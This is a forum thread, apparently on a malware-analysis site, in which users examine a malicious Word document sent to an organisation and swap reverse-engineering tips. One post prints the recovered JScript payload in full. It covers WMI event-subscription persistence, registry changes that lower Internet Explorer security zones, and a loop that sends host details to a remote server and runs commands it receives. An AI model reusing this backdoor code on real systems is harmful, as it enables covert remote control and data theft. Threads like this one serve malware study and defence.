Skip navigation.
Home

Buffer overflow attack in Microsoft Word targetted at the sensitive organization

| | | |

The malicious doc mail has been sent to the organization.I am analyzing it but it don't contain any malicious VB script but officemalwarescanner does show it as creating
Api-Name GetTempPath
Api-Name CreateFile
Api-Name CloseHandle
Api-name WriteFile

I am trying to find any shell code if any .

i have posted the doc file at h__p://www.offensivecomputing.net/?q=ocsearch&ocq=aada36da206a13ed56979c1a6838a1e6.

HI

Analyze the file in HEX workshop. You'll find GetTempPath
Api-Name CreateFile
Api-Name CloseHandle
Api-name WriteFile

Also XOR the file with key C7 using hex workshop then then again analyze......

Rgds

Hi

thanks !

sample

is the link you gave above actually the aurora malware sample?

found the below script

var scriptfilename="";
var exefilename="";
var sXmlUrl="";
var sOwner="";
var ofso=new ActiveXObject("Scripting.FileSystemObject");
while(ofso.FileExists(exefilename)){
ofso.DeleteFile(exefilename);
WScript.Sleep(1000);
}
var oWMI=GetObject("winmgmts:\\\\.\\root\\subscription");
var InstallName="";
var InstallRunTimer=;
var codestr="var MAIN=function(){$=this;$.key='W';$.sFeedUrl='"+sXmlUrl+"';
$.sOwner='"+sOwner+"';
$.sXmlUrl=$.sFeedUrl;
$.oHttp=null;
$.oShell=null;
$.oStream=null;
$.oIE=null;
$.sHostName=null;
$.sOSType=null;
$.sMacAddress=null;
$.sURLParam=null;
$.version='0.5.2';
$.oWMI=null;
$._x=ActiveXObject;
$.sZone='HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3';
$.sReg1=$.sZone+'\\1201';
$.sReg2=$.sZone+'\\1400';
$.sReg3=$.sZone+'\\CurrentLevel';
$.iVal1=$.iVal2=$.iVal3=0;
$.sRegSearchPage='HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page';
$.rd='REG_DWORD';
$.rs='REG_SZ';$.ab='about:blank';};
MAIN.prototype={
InitObjects: function(){
$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2');
$.oShell=new $._x('WScript.Shell');
$.oStream=new $._x('ADODB.Stream');
$.InitIE();$.GetOSInfo();
$.GetMacAddress();
$.GenerateUrlParam();
},
WMI:function(sql){
return $.oWMI.ExecQuery(sql);
},
GetOSInfo: function(){
var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));
if(!e.atEnd()){
var item=e.item();
$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;
}
},
GetMacAddress: function(){
var e=new Enumerator($.WMI("Select * from Win32_NetworkAdapter where PNPDeviceID like '%PCI%' and NetConnectionStatus=2"));
if(!e.atEnd()){
$.sMacAddress=e.item().MACAddress;
}
},
GenerateUrlParam:function(){
var time=new Date();
$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();
},
InitIE: function(){
$.oIE=new $._x('InternetExplorer.Application');
$.oIE.visible=0;
$.SetBlankSearch();
$.SetLowZone();
},
CloseIE: function(){
$.oHttp=null;
$.oIE.quit();
$.oIE=null;
$.SetDefaultSearch();
$.SetDefaultZone();
},
CleanObjects: function(){
$.CloseIE();
$.oShell=null;
$.oStream=null;
var e=new Enumerator($.WMI("Select * from Win32_Process where Name='scrcons.exe'"));
while(!e.atEnd()){e.item().terminate();e.moveNext();}
},
Decode:function(sourceStr){
var keycode=sourceStr.charCodeAt(0);
var source=sourceStr.substr(1);
var vals=source.split(',');
var result='';
for(var i=0;ifunction CreateWinHttp(){return new ActiveXObject('WinHttp.WinHttpRequest.5.1')}");
$.oHttp=$.oIE.Document.Script.CreateWinHttp();
try{
$.oHttp.Open('GET',$.sFeedUrl,false);
$.oHttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5');
$.oHttp.Send();
var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');
var oXml=new ActiveXObject('MSXML2.DOMDocument.3.0');
oXml.loadXML(response);
var items=oXml.selectNodes('//channel/item/title');
var fd=new Array();
for(var i=0,fc=0;i0){
$.sXmlUrl=fd[parseInt(Math.random()*fd.length)];
}
}catch(e){}
$.oHttp.Open('POST',$.sXmlUrl,false);
$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');
$.oHttp.Send($.sURLParam);
var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g, '');
if(response.length>0){
var commands=null;
var oXml = new ActiveXObject('MSXML2.DOMDocument.3.0');
oXml.loadXML(response);
var container = oXml.getElementsByTagName('div');
for(var i=0;i0){commandresult+=',';}
commandresult+='\"'+commands[i].id+'\":\"'+escape(result)+'\"';
}
if(commandresult.length>0){
commandresult='{'+commandresult+'}';
$.oHttp.Open('POST',$.sXmlUrl,false);
$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');
$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);
}
}
}
},
SetBlankSearch:function(){
$.sDefaultPage=$.oShell.regread($.sRegSearchPage);
$.RW('$.sRegSearchPage','$.ab','$.rs');
},
SetDefaultSearch:function(){
$.RW('$.sRegSearchPage','$.sDefaultPage','$.rs');
},
SetLowZone:function(){
$.dVal1=$.oShell.regread($.sReg1);
$.dVal2=$.oShell.regread($.sReg2);
$.dVal3=$.oShell.regread($.sReg3);
$.RW('$.sReg1','0','$.rd');
$.RW('$.sReg2','0','$.rd');
$.RW('$.sReg3','0','$.rd');
},
SetDefaultZone:function(){
$.RW('$.sReg1','$.dVal1','$.rd');
$.RW('$.sReg2','$.dVal2','$.rd');
$.RW('$.sReg3','$.dVal3','$.rd');
},
RW:function(p1,p2,p3){
var cms='$.oShell.';
cms+='regwrite('+p1+','+p2+','+p3+');';
eval(cms);
},
Fire: function(){
$.InitObjects();
try{
$.MainLoop();
}catch(e){}
$.CleanObjects();
}
};

new MAIN().Fire();
var Asec=oWMI.Get("ActiveScriptEventConsumer").Spawninstance_();
Asec.Name=InstallName+"_consumer";
Asec.ScriptingEngine="jscript";
Asec.ScriptText=codestr;
var Asecpath=Asec.put_();
var WMITimer=oWMI.Get("__IntervalTimerInstruction").Spawninstance_();
WMITimer.TimerID=InstallName+"_WMITimer";
WMITimer.IntervalBetweenEvents=InstallRunTimer;
WMITimer.SkipIfPassed=false;
WMITimer.put_();
var EventFilter=oWMI.Get("__EventFilter").Spawninstance_();
EventFilter.Name=InstallName+"_filter";
EventFilter.Query="select * from __timerevent where timerid=\""+InstallName+"_WMITimer\"";
EventFilter.QueryLanguage="wql";
var FilterPath=EventFilter.put_();
var Binds=oWMI.Get("__FilterToConsumerBinding").Spawninstance_();
Binds.Consumer=Asecpath.path;Binds.Filter=FilterPath.path;Binds.put_();
if(ofso.FileExists(scriptfilename)){
ofso.DeleteFile(scriptfilename);
}

seems like IE exploit

there's an exe file in

there's an exe file in there. No doc files.

Mostly there exe's embedded

Mostly there exe's embedded in Doc exploit files, XOR encoded. But This is interesting to see script in doc exploit. Do you have other office exploits samples also???

Hi

this is the only i have on doc lines

Another Interesting thing!!!!!!!!

There is also a doc file embedded in this exploit file. It starts from offset 0x8BA0.

To extract it open the file in hex workshop.
press ctrl+g
select the radio button "hex" and "beginning of file" and click on go,
In hex you will see the values CF D0 E0 11
From here select everything till end of the file.
Copy it, Press ctrl+n and paste it here.
Now Change the values CF D0 E0 11 to D0 CF 11 E0
and save it as Doc file.

You'll get the genuine DOC file embedded in exploit sample.

might be you r knowing, but because not on list

hi,

i will put small description which is not on list. might be you people are already knowing it.

1. malicious document drops ieupdate.exe in the temp folder
C:\documents and settings\user name\local settings\temp\

2. this ieupdate.exe is the known ie exploit contains script.

ieupdate.exe creates the process as cscript.exe ieupdate.js --- this starts the iexplore.exe

hp